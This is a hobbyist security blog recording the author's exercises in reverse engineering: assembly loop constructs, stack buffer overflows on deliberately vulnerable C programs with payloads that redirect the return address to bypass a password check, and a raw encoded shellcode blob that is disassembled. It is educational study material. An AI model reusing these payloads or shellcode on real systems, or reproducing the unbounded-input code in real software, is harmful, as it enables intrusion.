Posted by: nickfnord | January 24, 2009

My First Crackme

I wrote my first crackme this week.

it can be found here:
http://www.crackmes.de/users/nickfnord/nickfnords_keygenme_1/

here’s the description:

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
An experiment in obfuscation – by Nick Fnord
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

Date: 24-Jan-2009
Program Type: Console application
Crackme Type: KeygenMe/Analysis
Difficulty Level: I think this is a 3 or 4 but as it’s my first
crackme I’m unsure.
Programming Language: C++ with a bit of inline ASM
Platform: Only tested on WinXP but as I have included the
DLL’s statically it should run on anything that
supports the PE format.

Hi All,

This is my first crackme. I made it as an exercise in obfuscation and also
to experiment with some various anti-debugger techniques. I don’t think there
is a plug in to olly that successfully takes care of all the methods I used,
but if there is, I’d be interested to know about it.

The application will ask for a username and password, and if correct will
display a fairly well known poem.

Task One:
———
Your Primary task is to write a Keygen program for it. You are permitted to
do whatever you like to the original program.

Task Two:
———
Write a tutorial detailing how you went about making the keygen. Ideally,
Describe the program in High-level pseudo-code or in words, identifying all the
anti-debugger methods used.

Hope you have many hours of enjoyment from this one.

Cheers!
Nick (NickNOSPAM[at]nickfnord[dot]com)

That pretty much sums it up. I’m quite interested to see what other people think about it and whether they rate the program higher or lower than the 3 I gave it. Most of it was written with a glass of http://www.woodfordreserve.com/Default.aspx at hand so it’s perhaps not the most efficient bit of code I’ve made, but still 🙂

I offer a free cross link on this blog to the first person to crack it 🙂

enjoy!

Posted by: nickfnord | December 9, 2008

Juvenile Shellcode

hmm – was practicing writing shellcode today and…

C:\stuff\C\fun>notepad fun.asm

section .text
global _start
_start:
mov al, 0xb

C:\stuff\C\fun>nasm fun.asm

C:\stuff\C\fun>ndisasm fun
00000000 B00B mov al,0xb

just imagine if they taught shellcode in junior high-school…

there you go – you know how they talk about those crazy people who can read hex opcodes? well, you’re one now because you’re not going to forget that mov al, 0xb is B00B.
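The B0 in there is not arbitrary: on x86, "mov r8, imm8" is encoded as the single opcode byte B0 plus the register number, followed by the immediate byte. A minimal sketch of that rule in C (the enum and the function name encode_mov_r8_imm8 are made up for illustration):

```c
#include <stdint.h>

/* Register numbers used by the B0+r encoding of "mov r8, imm8". */
enum reg8 { AL = 0, CL = 1, DL = 2, BL = 3, AH = 4, CH = 5, DH = 6, BH = 7 };

/* Returns the two-byte encoding packed as (opcode << 8) | immediate.
   encode_mov_r8_imm8 is a hypothetical helper, not part of any toolchain. */
uint16_t encode_mov_r8_imm8(enum reg8 reg, uint8_t imm)
{
    uint8_t opcode = (uint8_t)(0xB0 + reg);   /* B0 for al, B1 for cl, ... */
    return (uint16_t)((opcode << 8) | imm);
}
```

Calling encode_mov_r8_imm8(AL, 0x0b) gives 0xB00B, the same two bytes ndisasm printed above.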

Posted by: nickfnord | November 24, 2008

Assembly constructs (loops)

Differing constructs on different systems.

so just a quick one this time:

I’m going through the InfoSec Institute’s reverse engineering course and one of the fundamental things being emphasised is the ability to quickly recognise program constructs within assembly. This allows you to skim through a disassembled program and identify the important parts that need more attention, rather than struggling to manually disassemble everything first time.

so it turns out that as is the case with most things, this is a skill that comes with much experience. as you encounter new situations you’ll learn how to better identify these sorts of things.

take for example this very simple program below – all it does is point every element of an array at an empty string, but when disassembled, it comes out three different ways depending on the compiler and the system.

here’s the original program:

int main()
{
char *array[50];
int i;

for (i=0;i<50;i++)
{
array[i] = "";
}
return 0;
}

compiled with lcc and disassembled with nasm on winXP creates a Do-While loop:

000006D4 push ebp ; set up frame
000006D5 mov ebp,esp ;
000006D7 sub esp,0xcc ; allocating space (204d)
000006DD push esi ;
000006DE push edi ;
000006DF mov dword [ebp-0x4],0x0 ; setting ebp-4 to 0 (ebp-4 = counter)
000006E6 mov edi,[ebp-0x4] ; placing counter into edi
000006E9 lea esi,[dword 0x4040a0] ; loading hard-coded value into esi
000006EF mov [ebp+edi*4-0xcc],esi ; inserting said value into array[edi]
000006F6 inc dword [ebp-0x4] ; increment counter
000006F9 cmp dword [ebp-0x4],byte +0x32 ; compare counter to 50
000006FD jl 0x6e6 ; return to start of loop if less than 50
000006FF mov eax,0x0 ; set up return value
00000704 pop edi ;
00000705 pop esi ;
00000706 leave ; clean up
00000707 ret ; return.

compiled with gcc and disassembled with gdb on redhat linux creates a While-Do loop:

main+0: push %ebp
main+1: mov %esp,%ebp
main+3: sub $0xe8,%esp
main+9: and $0xfffffff0,%esp
main+12: mov $0x0,%eax
main+17: add $0xf,%eax
main+20: add $0xf,%eax
main+23: shr $0x4,%eax
main+26: shl $0x4,%eax
main+29: sub %eax,%esp
main+31: movl $0x0,0xffffff24(%ebp) ; move 0 into ebp-0xdc (the counter)
main+41: cmpl $0x31,0xffffff24(%ebp) ; start of loop, compare counter to 49
main+48: jg 0x8048381 main+77 ; if it is greater, jump to the end
main+50: mov 0xffffff24(%ebp),%eax ; stick counter into eax
main+56: movl $0x8048468,0xffffff28(%ebp,%eax,4) ; move constant value into ebp + eax * 4 (array[eax])
main+67: lea 0xffffff24(%ebp),%eax ; load address of counter into eax
main+73: incl (%eax) ; inc value pointed at by eax
main+75: jmp 0x804835d main+41 ; jump back to start
main+77: mov $0x0,%eax ; set up return value
main+82: leave ; clean up
main+83: ret ; return

compiled with gcc and disassembled with gdb on backtrack3 running in a virtual machine creates a While-Do loop, but backwards (the compare sits at the bottom):

main+0: lea 0x4(%esp),%ecx
main+4: and $0xfffffff0,%esp
main+7: pushl 0xfffffffc(%ecx)
main+10: push %ebp
main+11: mov %esp,%ebp
main+13: push %ecx
main+14: sub $0xd0,%esp
main+20: movl $0x0,0xfffffff8(%ebp) ; setting ebp-8 (the counter) to 0
main+27: jmp 0x8048352 main+46 ; Jump straight to the compare
main+29: mov 0xfffffff8(%ebp),%eax ; start of loop - putting counter into eax
main+32: movl $0x8048448,0xffffff30(%ebp,%eax,4) ; move hardcoded value to array[eax]
main+43: incl 0xfffffff8(%ebp) ; increment counter at ebp-8
main+46: cmpl $0x31,0xfffffff8(%ebp) ; compare this to 49
main+50: jle 0x8048341 main+29 ; go back to start if less than or equal to
main+52: mov $0x0,%eax ; set up return value
main+57: add $0xd0,%esp ; clean up
main+63: pop %ecx
main+64: pop %ebp
main+65: lea 0xfffffffc(%ecx),%esp
main+68: ret ; return

All of these are semantically exactly the same, but are implemented in very different ways. it is important to be able to quickly recognise these structures and to not be fooled just because there’s something that is seemingly nonsensical – it’s probably the compiler just trying to do it better.
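To make the three shapes easier to compare, here is a rough C rendering of each listing's control flow, using goto where the compiler used a jump. This is a sketch for illustration only: the function names and the all_empty_after checker are made up, and the gotos mirror the jumps in the listings rather than anything you would normally write.

```c
#include <stddef.h>

#define N 50

/* lcc listing: body first, test at the bottom (do-while). */
int fill_do_while(const char *array[N])
{
    int i = 0;
    do {
        array[i] = "";
        i++;
    } while (i < N);             /* cmp counter,50 / jl back to the body */
    return i;
}

/* redhat gcc listing: test at the top, unconditional jump back. */
int fill_test_at_top(const char *array[N])
{
    int i = 0;
top:
    if (i > N - 1) goto done;    /* cmpl $0x31 / jg to the end */
    array[i] = "";
    i++;
    goto top;                    /* jmp back to the compare */
done:
    return i;
}

/* backtrack3 gcc listing: jump straight to a test placed at the bottom. */
int fill_jump_to_test(const char *array[N])
{
    int i = 0;
    goto test;                   /* jmp to the compare */
body:
    array[i] = "";
    i++;
test:
    if (i <= N - 1) goto body;   /* cmpl $0x31 / jle back to the body */
    return i;
}

/* Hypothetical checker: returns 1 if fill() ran N times and left every
   element pointing at an empty string. */
int all_empty_after(int (*fill)(const char **))
{
    const char *array[N];

    for (int i = 0; i < N; i++)
        array[i] = NULL;
    if (fill(array) != N)
        return 0;
    for (int i = 0; i < N; i++)
        if (array[i] == NULL || array[i][0] != '\0')
            return 0;
    return 1;
}
```

All three functions leave the array in the same state; only the position of the compare and the direction of the jumps differ.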

it’s all good fun anyway 🙂

Posted by: nickfnord | November 13, 2008

supporting legacy code

so I’ve found that I have to do a bit of maintenance on a COBOL module at work…… I’ve been avoiding it but can’t any longer. I was actually kind of curious to see what it would be like and was kind of looking forward to it, but it seems that I was a fool.

here’s just a small snippet:

IF WH-CONDITION = "Y"
SET TRUE-CONDITION TO TRUE
ELSE
SET FALSE-CONDITION TO TRUE
END-IF.

*sigh*

Posted by: nickfnord | November 1, 2008

Overflows in Linux

My brother bought me The Shellcoder’s Handbook as an early Christmas present and so I’ve been going through the first few chapters over the past few days. It is quite comprehensive and to my delight I found I don’t understand everything in it – which means I’m going to learn a lot as I go through it.

The first section deals with Linux, and explains that it is doing so because of the “solid, reliable, internal operating system structures” available to work with.

So I finally bit the bullet and decided to get used to using gdb. I generally dislike using command line programs of this sort, particularly after having used wonderful applications such as IDA Pro and OllyDbg, but after dragging myself kicking and screaming through a tutorial or two, I started to like it. I was also consoled by the fact that I found the vi syntax highlighting with the backtrack3 background to be damn sexy.

The following two programs are taken from the second chapter, with my own notes rather than word for word from the book. One reason is that I’ve found the book has a few technical errors in it – which, in a way, is good because it means I have to understand what’s going on. The other reason is that I’m trying to solidify it in my own mind, and writing this helps.

sample program 1 (reproduced from the book):

#include <stdio.h>
#include <string.h>

void return_input(void)
{
    char array[30];

    gets(array);              /* no bounds check: this is the overflow */
    printf("%s\n", array);
}

int main(void)
{
    return_input();
    return 0;
}

so we compile this:

cc overflow.c -o overflow

and ignore the warning about the ‘gets’ function.

running it demonstrates that all it does is take some input and pump it out again:

bt temp # ./overflow
Hello World
Hello World
bt temp #

but what happens when we put in more than 30 characters?

bt temp # ./overflow
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
Segmentation fault
bt temp #

ok so just for kicks, we want to make the program display the input twice, so we open it up in gdb:

bt temp # gdb overflow
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...
Using host libthread_db library "/lib/libthread_db.so.1".

then we disassemble the main function:


(gdb) disas main
Dump of assembler code for function main:
0x080483aa <main+0>: lea 0x4(%esp),%ecx
0x080483ae <main+4>: and $0xfffffff0,%esp
0x080483b1 <main+7>: pushl 0xfffffffc(%ecx)
0x080483b4 <main+10>: push %ebp
0x080483b5 <main+11>: mov %esp,%ebp
0x080483b7 <main+13>: push %ecx
0x080483b8 <main+14>: sub $0x4,%esp
0x080483bb <main+17>: call 0x8048384 <return_input>
0x080483c0 <main+22>: mov $0x0,%eax
0x080483c5 <main+27>: add $0x4,%esp
0x080483c8 <main+30>: pop %ecx
0x080483c9 <main+31>: pop %ebp
0x080483ca <main+32>: lea 0xfffffffc(%ecx),%esp
0x080483cd <main+35>: ret
End of assembler dump.

and take note of the address where it is calling the return_input function (0x080483bb).

disassembling the return_input function gives us the following:

(gdb) disas return_input
Dump of assembler code for function return_input:
0x08048384 <return_input+0>: push %ebp
0x08048385 <return_input+1>: mov %esp,%ebp
0x08048387 <return_input+3>: sub $0x28,%esp
0x0804838a <return_input+6>: sub $0xc,%esp
0x0804838d <return_input+9>: lea 0xffffffe2(%ebp),%eax
0x08048390 <return_input+12>: push %eax
0x08048391 <return_input+13>: call 0x80482b0 <gets@plt>
0x08048396 <return_input+18>: add $0x10,%esp
0x08048399 <return_input+21>: sub $0xc,%esp
0x0804839c <return_input+24>: lea 0xffffffe2(%ebp),%eax
0x0804839f <return_input+27>: push %eax
0x080483a0 <return_input+28>: call 0x80482d0 <puts@plt>
0x080483a5 <return_input+33>: add $0x10,%esp
0x080483a8 <return_input+36>: leave
0x080483a9 <return_input+37>: ret
End of assembler dump.

note the two calls – one to gets and one to puts (gcc has swapped our printf("%s\n", ...) for the equivalent puts). set a breakpoint on the call to gets and on the ret command at the end of the function:

(gdb) break *0x08048391
Breakpoint 1 at 0x8048391
(gdb) break *0x080483a9
Breakpoint 2 at 0x80483a9

and execute

(gdb) run
Starting program: /temp/overflow

Breakpoint 1, 0x08048391 in return_input ()

now, we look back at the disassembly of the main function and note that the next instruction after the call to return_input is at 0x080483c0.

at this point, because we are in the function return_input, the address of that next instruction has been pushed onto the stack as the return address (the saved eip). so we take a snapshot of the stack:

(gdb) x/20x $esp
0xbffff270: 0xbffff28a 0x00000000 0x00000000 0x08048310
0xbffff280: 0x00000000 0x0804958c 0xbffff298 0x0804828d
0xbffff290: 0xb7fc9ff4 0xb7fc8220 0xbffff2c8 0x080483f9
0xbffff2a0: 0xb7fc9ff4 0xbffff35c 0xbffff2b8 0x080483c0
0xbffff2b0: 0xb7ff3b90 0xbffff2d0 0xbffff328 0xb7ea1df8

and see that the saved eip (0x080483c0, the last word of the 0xbffff2a0 row) is sitting there nicely, ready for us to overwrite.

hit continue:

(gdb) continue
Continuing.
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD

Breakpoint 2, 0x080483a9 in return_input ()

so now we’re at the return command – let’s take another look at the stack:

(gdb) x/20x $esp
0xbffff2ac: 0x44444444 0xb7004444 0xbffff2d0 0xbffff328
0xbffff2bc: 0xb7ea1df8 0xb8000ce0 0x080483e0 0xbffff328
0xbffff2cc: 0xb7ea1df8 0x00000001 0xbffff354 0xbffff35c
0xbffff2dc: 0xb8001890 0x00000000 0x00000001 0x00000001
0xbffff2ec: 0x00000000 0xb7fc9ff4 0xb8000ce0 0x00000000

you can see that the value at the top of the stack just prior to execution of the ret command is a whole bunch of D’s – 6 of them in fact (followed by the terminating null), meaning that because we entered 10, the other four must have overwritten the saved EBP.

going back 4 bytes in the stack confirms it:

(gdb) x/20x 0xbffff2a8
0xbffff2a8: 0x44444444 0x44444444 0xb7004444 0xbffff2d0

and continuing again confirms the overwrite of the return address:

(gdb) continue
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? ()

so in any case, now we want to overwrite the saved EIP with the address of the call to return_input in main (0x080483bb) to make it output twice. we can use the printf command to send the non-printable characters to the overflow program. we want to fill up the buffer (AAAAAAAAAABBBBBBBBBBCCCCCCCCCC), overwrite the pushed ebp (DDDD) and then overwrite the return address with that address, written least significant byte first.

bt temp # printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\xbb\x83\x04\x08" | ./overflow
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD»
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDÀ
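The 30 + 4 bytes of padding can be cross-checked against the disassembly: return_input locates the buffer with "lea 0xffffffe2(%ebp),%eax", which is ebp-30, and the return address sits just past the 4-byte saved ebp. A small sketch of that arithmetic, assuming the usual [buffer][saved ebp][return address] frame layout (padding_to_return_address is a made-up name):

```c
#include <stdint.h>

/* Bytes of filler needed before the saved return address, given the
   32-bit displacement from "lea disp(%ebp),%eax" that locates the buffer.
   Assumes the frame layout [buffer ...][saved ebp (4 bytes)][return address]. */
uint32_t padding_to_return_address(uint32_t lea_disp)
{
    uint32_t to_saved_ebp = (uint32_t)(0u - lea_disp);  /* 0xffffffe2 -> 30 */
    return to_saved_ebp + 4;                            /* skip saved ebp too */
}
```

For 0xffffffe2 this gives 34, which agrees with the stack dumps above: the buffer starts at 0xbffff28a and the return address is stored at 0xbffff2ac, 0x22 bytes later.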

Now here in The Shellcoder’s Handbook is an example of one of about 3 or so errors I’ve encountered in this chapter alone – the line in the book prints 6 D’s and not 4, causing the return address to contain 2 D’s rather than the address we passed in. I don’t really know what happened to proofreading, but it’s a good feeling to understand what is wrong with their examples and to be able to correct them, so perhaps they put them in deliberately. (I just hope that I’m able to pick these things up as the book gets more advanced.)

The book goes on to explain that we don’t necessarily always want to spawn a shell with our shellcode – sometimes exploiting the program within itself is enough. in fact it mentions that many defenses against buffer overflows are rendered useless if the attacker uses the functionality of the program to achieve their goals – so the next example uses a buffer overflow to bypass authentication:

Here I haven’t reproduced their code at all: because I wanted to practice by myself, I wrote my own program that does basically the same thing. this is based on the helloworld4 program from a previous blog.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

void keygen(char p[], char c[])
{
    int i, j;
    char key[] = "NICKFNORD";

    /* generate password C = p + k (mod 26) */
    for (i = 0, j = 0; i < strlen(p); i++, j++)
    {
        if (j >= strlen(key))
        {
            j = 0;
        }
        c[i] = ((toupper(p[i]) - 65 + key[j] - 65) % 26 + 65);
    }
}

int get_username_password()
{
    char username[50];
    char password[50];
    char correctp[50];
    int i;

    for (i = 0; i < 50; i++)
    {
        correctp[i] = '\0';
        password[i] = '\0';
        username[i] = '\0';
    }

    printf("Enter Username:\n");
    fscanf(stdin, "%s", username);   /* unbounded read: this is the overflow */
    printf("Enter Password:\n");
    fscanf(stdin, "%s", password);
    /* username and password must each be at least 8 characters */
    if (strlen(username) < 8 || strlen(password) < 8)
    {
        printf("invalid username/password combination");
        return 0;
    }

    keygen(username, correctp);

    if (strcmp(correctp, password) == 0)
    {
        return 1;
    }
    else
    {
        return 0;
    }
}

void do_valid_stuff()
{
    printf("Wooo - The username and password are correct!\n exiting\n\n");
    exit(0);
}

void do_invalid_stuff()
{
    printf("Danger Danger will robinson!!!\n\n");
    exit(1);
}

int main(void)
{
    if (get_username_password())
    {
        do_valid_stuff();
    }
    else
    {
        do_invalid_stuff();
    }
    return 0;
}

and run it:

bt temp # serial
Enter Username:
AAAAAAAAAA
Enter Password:
BBBBBBBBBB
Danger Danger will robinson!!!

Awwwwww, we suck….
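For comparison, this is what a legitimate login would have needed. The keygen routine is a Vigenère-style shift: each letter of the username is added to the matching letter of the repeating key "NICKFNORD", modulo 26. A minimal sketch of the same arithmetic (expected_password is an illustrative name; like the original, it only makes sense for alphabetic usernames):

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Same arithmetic as keygen() above: c = (p + k) mod 26 over A..Z,
   with the key "NICKFNORD" repeated. out must have room for
   strlen(user) + 1 bytes. expected_password is a hypothetical name. */
void expected_password(const char *user, char *out)
{
    static const char key[] = "NICKFNORD";
    size_t klen = strlen(key);
    size_t i;

    for (i = 0; user[i] != '\0'; i++)
    {
        int p = toupper((unsigned char)user[i]) - 'A';
        int k = key[i % klen] - 'A';
        out[i] = (char)((p + k) % 26 + 'A');
    }
    out[i] = '\0';
}
```

Since 'A' contributes zero to the sum, the username AAAAAAAAAA simply reads the key back out: the matching password is NICKFNORDN.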

So the idea with this one is that we redirect the program flow to the do_valid_stuff() function. we know that there’s no validation on the input length so if we send through enough characters it will overflow.

first we find the address of the call to do_valid_stuff:

(gdb) disas main
Dump of assembler code for function main:
0x080486b0 <main+0>: lea 0x4(%esp),%ecx
0x080486b4 <main+4>: and $0xfffffff0,%esp
0x080486b7 <main+7>: pushl 0xfffffffc(%ecx)
0x080486ba <main+10>: push %ebp
0x080486bb <main+11>: mov %esp,%ebp
0x080486bd <main+13>: push %ecx
0x080486be <main+14>: sub $0x4,%esp
0x080486c1 <main+17>: call 0x804851c <get_username_password>
0x080486c6 <main+22>: test %eax,%eax
0x080486c8 <main+24>: je 0x80486d1 <main+33>
0x080486ca <main+26>: call 0x8048670 <do_valid_stuff>
0x080486cf <main+31>: jmp 0x80486d6 <main+38>
0x080486d1 <main+33>: call 0x8048690 <do_invalid_stuff>
0x080486d6 <main+38>: mov $0x0,%eax
0x080486db <main+43>: add $0x4,%esp
0x080486de <main+46>: pop %ecx
0x080486df <main+47>: pop %ebp
0x080486e0 <main+48>: lea 0xfffffffc(%ecx),%esp
0x080486e3 <main+51>: ret
End of assembler dump.

so we find we want to redirect to 0x080486ca.

then we ensure that our core will be dumped if there’s a segmentation fault:

ulimit -c unlimited

and send through a long series of characters:

bt temp # printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ" | ./serial
Enter Username:
Enter Password:
Segmentation fault (core dumped)

bt temp # gdb -q -c core
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
Core was generated by `./serial'.
Program terminated with signal 11, Segmentation fault.
#0 0x45454545 in ?? ()

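so we know that we can overwrite the return address with the E’s. note that there are two groups of E’s in the input; it’s the EEEE after DDDD, 66 bytes in, that lands on the return address.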

or we could have used the debugger of course and put a break point on the return command of the get_username_password function and then dumped the stack:

0x0804866b <get_username_password+335>: mov 0xfffffffc(%ebp),%edi
0x0804866e <get_username_password+338>: leave
0x0804866f <get_username_password+339>: ret
End of assembler dump.

(gdb) break *0x0804866f
Breakpoint 1 at 0x804866f
(gdb) run
Starting program: /temp/serial
Enter Username:
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
Enter Password:
asdfasdfasdf

Breakpoint 1, 0x0804866f in get_username_password ()
(gdb) x/4x $esp
0xbffff31c: 0x45454545 0x46464646 0x47474747 0x48484848

demonstrating that at the return command, the item on top of the stack is EEEE…

and so we modify our call to the program:

bt temp # printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEAAAABBBBCCCCDDDD\xca\x86\x04\x08" | ./serial
Enter Username:
Enter Password:
Wooo - The username and password are correct!
exiting


…and so we’ve redirected the program flow and have accessed a “secure” area of the program – yay for us.
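Both exploit strings in this post have the same shape: some filler, then a 4-byte address written least significant byte first because x86 is little-endian. A rough sketch of building such a string in C rather than with printf (build_payload and MAX_PAYLOAD are illustrative names, and the static buffer is just to keep the example short):

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MAX_PAYLOAD 256

/* Fill a static buffer with pad_len filler bytes followed by addr stored
   least significant byte first. Returns NULL if the payload would not fit.
   build_payload and MAX_PAYLOAD are made-up names for this sketch. */
const uint8_t *build_payload(size_t pad_len, uint32_t addr)
{
    static uint8_t payload[MAX_PAYLOAD];

    if (pad_len > MAX_PAYLOAD - 4)
        return NULL;
    memset(payload, 'A', pad_len);
    payload[pad_len + 0] = (uint8_t)(addr & 0xff);
    payload[pad_len + 1] = (uint8_t)((addr >> 8) & 0xff);
    payload[pad_len + 2] = (uint8_t)((addr >> 16) & 0xff);
    payload[pad_len + 3] = (uint8_t)((addr >> 24) & 0xff);
    return payload;
}
```

build_payload(66, 0x080486ca) produces 66 filler bytes followed by ca 86 04 08, the same layout as the printf command above (with A’s in place of the mixed letters), and build_payload(34, 0x080483bb) matches the earlier overflow example.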

of course, this isn’t really all that impressive in the scheme of things – I just wanted to demonstrate (to myself if no one else) the use of gdb. and writing this helps solidify this in my mind.

As it says in The Shellcoder’s Handbook: “Now it is time to do something useful with the vulnerability you exploited earlier. Forcing overflow.c to ask for input twice instead of once is a neat trick, but hardly something you would want to tell your friends about – ‘Hey, guess what, I caused a 15 line C program to ask for input twice!’ No, we want you to be cooler than that.”

yes, well – coolness levels increasing ever so slightly.

Posted by: nickfnord | October 30, 2008

decoding shellcode

Just a quick post – want to find out what shellcode actually does? pump it out to a file like so:

#!/usr/local/bin/perl
$shellcode .= #164 bytes
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe2".
"\x61\xf1\x91\x83\xeb\xfc\xe2\xf4\x1e\x89\xb5\x91\xe2\x61\x7a\xd4".
"\xde\xea\x8d\x94\x9a\x60\x1e\x1a\xad\x79\x7a\xce\xc2\x60\x1a\xd8".
"\x69\x55\x7a\x90\x0c\x50\x31\x08\x4e\xe5\x31\xe5\xe5\xa0\x3b\x9c".
"\xe3\xa3\x1a\x65\xd9\x35\xd5\x95\x97\x84\x7a\xce\xc6\x60\x1a\xf7".
"\x69\x6d\xba\x1a\xbd\x7d\xf0\x7a\x69\x7d\x7a\x90\x09\xe8\xad\xb5".
"\xe6\xa2\xc0\x51\x86\xea\xb1\xa1\x67\xa1\x89\x9d\x69\x21\xfd\x1a".
"\x92\x7d\x5c\x1a\x8a\x69\x1a\x98\x69\xe1\x41\x91\xe2\x61\x7a\xf9".
"\xde\x3e\xc0\x67\x82\x37\x78\x69\x61\xa1\x8a\xc1\x8a\x91\x7b\x95".
"\xbd\x09\x69\x6f\x68\x6f\xa6\x6e\x05\x02\x90\xfd\x81\x4f\x94\xe9".
"\x87\x61\xf1\x91";

open (FILE, ">shellcode.bin");
binmode(FILE);   # write raw bytes (matters on Windows)
print FILE "$shellcode";
close(FILE);

then disassemble with ndisasm (part of nasm):

ndisasm -b 32 shellcode.bin > shellcode.asm

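and you’ll get a file with the assembly (the bytes in the listing below differ from the script above, so it evidently came from a different sample, but the structure is the same):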

00000000  29C9              sub ecx,ecx
00000002  83E9DD            sub ecx,byte -0x23
00000005  D9EE              fldz
00000007  D97424F4          fnstenv [esp-0xc]
0000000B  5B                pop ebx
0000000C  817313CAC57A1A    xor dword [ebx+0x13],0x1a7ac5ca
00000013  83EBFC            sub ebx,byte -0x4
00000016  E2F4              loop 0xc
00000018  362D3E1ACAC5      ss sub eax,0xc5ca1a3e
0000001E  F1                int1
0000001F  5F                pop edi
00000020  F6                db 0xF6
00000021  4E                dec esi
00000022  06                push es
00000023  1F                pop ds
00000024  B2C4              mov dl,0xc4
00000026  95                xchg eax,ebp
00000027  91                xchg eax,ecx
00000028  85DD              test ebp,ebx
0000002A  F1                int1
0000002B  45                inc ebp
0000002C  EAC4915341F1F1    jmp dword 0xf1f1:0x415391c4
00000033  1B24F4            sbb esp,[esp+esi*8]
00000036  BA836641BA        mov edx,0xba416683
0000003B  6E                outsb
0000003C  CD04              int 0x4
0000003E  B017              mov al,0x17
00000040  CB                retf
00000041  07                pop es
00000042  91                xchg eax,ecx

etc.
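One thing worth noting about that listing (this is my reading of it, not something the disassembler tells you): the first eight instructions look like a decoder stub. They set ECX to 0x23, fetch the stub's own address with the fldz / fnstenv / pop ebx trick, then XOR one dword at a time with a 4-byte key starting at offset 0x18, looping 0x23 times. If that reading is right, everything from offset 0x18 onwards is still encoded, which would explain why the disassembly turns into nonsense there. A minimal sketch of doing the decoding offline, with made-up names:

```c
#include <stddef.h>
#include <stdint.h>

/* XOR ndwords 4-byte words of buf, starting at offset start, with a
   4-byte key given in memory order. This mirrors what the stub's
   "xor dword [ebx+0x13],key / sub ebx,-4 / loop" sequence appears to do.
   xor_decode is a hypothetical helper, not part of any tool. */
void xor_decode(uint8_t *buf, size_t start, size_t ndwords, const uint8_t key[4])
{
    for (size_t i = 0; i < ndwords * 4; i++)
        buf[start + i] ^= key[i % 4];
}
```

For the 164-byte buffer in the Perl script, the key bytes are e2 61 f1 91 (in the listing they are ca c5 7a 1a), so the call would be xor_decode(buf, 0x18, 0x23, key). The decoded region then starts fc e8 44 00 00 00, which is a cld followed by a call, and the decoded buffer can be written back out and run through ndisasm again.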

or you can let IDA work its magic on the .bin file, which provides a bit more analysis.

…contributions are welcome for the “buy Nick IDAPro” fund.

another quick note – I’ve posted a question over at the ethical hacker forums – I’ll post the results here when they come through.

Posted by: nickfnord | October 17, 2008

Buffer overflow basics part 1

I’ve become fairly distracted over the past few weeks and never ended up finishing the previous train of blogging. This is partly because I hit a wall when trying to make a keygen program for the program in the previous blog (by extracting the relevant assembly code), and partly because I’ve found myself easily distracted by other things, such as understanding buffer overflows of varying complexity, setting up a VMware environment (still haven’t got it configured properly…) and setting up a web server for web app testing (that one was fairly straightforward, thankfully). There’s so much to learn and to do, and most of it is far more interesting than learning about breaking protection.

But mostly I found this article which sort of took the wind out of me a little bit: http://www.ethicalhacker.net/content/view/152/2/ – absolutely brilliant – a very clear and concise introduction to reversing. It was very encouraging to see that the author took a similar approach to what I did (or the other way around), which means I’m on the right track, but his article is written with so much more background knowledge that it makes mine look pathetic 🙂 So I have sort of been reluctant to post anything new really.

However, taking heart in the fact that I never promised this blog to be anything except me fumbling my way through a torrent of information, I now present:

Buffer overflow basics:

Below is the code for overflowme.c. Sorry for the array intro there – it’s necessary for the moment to make the stack large enough for our shellcode – more detail at the end and in the next post.

#include <stdio.h>
#include <string.h>

void copyme(char *input)
{
    char name[256];

    strcpy(name, input);   /* no length check: this is the overflow */
}

int main(int argc, char **argv)
{
    char intro[] = "Hello and welcome to buffer overflow basics, this character array really does have a purpose, it will be explained later, in reallity it is a bit of a hack but it will be used to demonstrate something later on";
    printf("%s", intro);
    copyme(argv[1]);
    return 0;
}

Buffer overflows occur when data moved into a variable on the stack continues past the bounds of the variable. For example, the function copyme in the above code declares a variable “name” as an array of char with 256 elements. When the program runs, it will allocate 256 bytes on the stack when entering the function. The strcpy function will then copy the input from the command line into the name variable.

Let’s have a quick peek at the program in ollydbg. You can apply command line arguments to your olly session by going to Debug->Arguments. Alternatively, you can get Perl (download and install ActivePerl if you don’t have it already) to do it for you, which I have found quite a bit easier seeing as we’ll be using Perl to write shellcode later on. the following Perl script will execute Olly (change the path to olly to suit yours of course), attach it to the overflowme executable and pass “Hello” in as a command line parameter:

#!/usr/local/bin/perl
$buffer = "Hello";
exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

as you step through the program, you can see that the call to our copyme function is here:


0040132B   |.  E8 A4FFFFFF       CALL overflow.004012D4

the whole function looks like this:

004012D4   /$  55                PUSH EBP
004012D5   |.  89E5              MOV EBP,ESP
004012D7   |.  81EC 00010000     SUB ESP,100
004012DD   |.  57                PUSH EDI
004012DE   |.  FF75 08           PUSH [ARG.1]
004012E1   |.  8DBD 00FFFFFF     LEA EDI,[LOCAL.64]
004012E7   |.  57                PUSH EDI
